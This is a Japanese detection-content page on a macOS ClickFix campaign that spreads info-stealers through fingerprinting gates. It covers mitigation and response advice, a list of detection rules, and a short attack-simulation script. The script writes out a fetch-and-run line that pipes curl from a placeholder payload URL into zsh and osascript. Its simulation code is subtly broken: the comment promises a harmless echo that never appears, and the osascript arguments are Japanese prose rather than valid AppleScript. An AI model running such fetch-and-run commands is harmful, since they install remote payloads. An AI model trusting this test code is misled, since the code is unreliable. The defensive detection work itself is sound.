macOS ClickFixキャンペーン、隠された感染ゲートで進化
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
macOS ClickFixキャンペーンが、MacSyncやAtomic Stealer(AMOS)を含む情報スティーラーを、巧妙なサーバーサイドのフィンガープリンティングゲートを通じて配信しています。この作戦はアルゴリズムで生成されたドメインとブラウザのフィンガープリンティングを使用し、悪意のあるペイロードが本物のmacOSユーザーのみに配信されることを確実にし、自動セキュリティ解析とクローラーを回避します。この進化は、広範なソーシャルエンジニアリングから高度にターゲットを絞った隠蔽された配信手法への変化を示しています。
調査
Microsoft Threat Intelligenceは、一連の名前付けパターンを共有する250を超えるドメインのクラスターを追跡し、キャンペーンを発見しました。調査により、直接的な引き寄せ配信から、軽量なJavaScriptプロファイリングを含む2段階のプロセスへの移行が明らかになりました。WebGLシグナル、タイムゾーンオフセット、解析回避チェックを評価することで、研究者はインフラがどのようにしてmacOS環境を選択的にターゲットにし、非該当リクエストには無害なデコイコンテンツを提示するかを特定しました。
緩和
組織はユーザーに、正当なソフトウェアの更新にはTerminalにコマンドを貼り付ける必要がないことを教育すべきです。セキュリティチームは、webブラウジングの後にトリガーされた場合の curl, base64, gunzip、または osascriptを使用する不審なTerminalの活動を監視するべきです。Keychainデータの保護を強化し、重要なファイルの無許可のアーカイブ化を監視することも、侵害の成功による影響を減らすことができます。
対応
不審なTerminal実行やクリデンティアルストアへの無許可のアクセスが検出された場合、対応者は影響を受けたmacOSエンドポイントを直ちに隔離するべきです。低信頼性のドメインへのアウトバウンド接続を調査し、特に /curl/ のリクエストパターンに注意を払ってください。特定した悪意のあるステージングホストはブロックし、エンコードまたは曖昧化されたコマンドの実行がないか、最近のシェルヒストリーを確認する必要があります。
攻撃フロー
検出
疑わしいCurl実行試行 [MacOS](コマンドライン経由)
Proof of Value
異常なトップレベルドメイン(TLD)DNSリクエストによる疑わしい指揮と制御(C2)活動(DNS経由)
Proof of Value
Base64エンコード文字列の操作の可能性 [MacOS](コマンドライン経由)
Proof of Value
疑わしいドメインと予期しない地理/ブラウザへのアウトバウンド接続を検出 [ファイアウォール]
Proof of Value
ClickFixキャンペーンによる悪意のあるmacOSターミナルコマンド実行 [Linuxプロセス作成]
Proof of Value
シミュレーション実行
前提条件:テレメトリーとベースラインの事前チェックが通過している必要があります。
理由:このセクションは、検出ルールをトリガーするために設計されたアドバサリー技術(TTP)の正確な実行を詳述します。コマンドと説明は、特定されたTTPを直接反映し、検出ロジックによって期待される正確なテレメトリーを生成することを目的としています。抽象的または関連性のない例は、誤診を招くでしょう。
-
攻撃の説明とコマンド: 攻撃者はWebブラウザでの偽のエラーメッセージを提示し、ユーザーに特定のコマンドをTerminalに貼り付けるよう指示することで、ClickFixキャンペーンを開始します。攻撃者の目標は、持続性を確立するか、マルウェアをダウンロードすることです。このコマンドは、
curlを使用してリモートサーバーから悪意のあるAppleScriptペイロードを取得し、osascript -eを使用してメモリ内で即座に実行し、従来のファイルベースのスキャンを回避します。 -
回帰テストスクリプト:
# ClickFixのシミュレーション:ペイロードを取得してosascript経由で実行 # 注意:実際の感染を避けるために、リモートペイロードをシミュレートする無害なechoコマンドを使用します。 curl -s https://raw.githubusercontent.com/example/payload/main/script.sh | zsh -c 'osascript -e "セキュリティ警告:システム更新が必要ですというダイアログを表示する"' # 検出ルールを確実にトリガーするために、正確なパターンを実行します: osascript -e '「これはシミュレーションされた攻撃です」と言わせる' -
クリーンアップコマンド:
# この特定のコマンドライン実行ではディスクに書き込まれるファイルはありませんが、バックグラウンドプロセスが終了していることを確認します。 killall osascript || true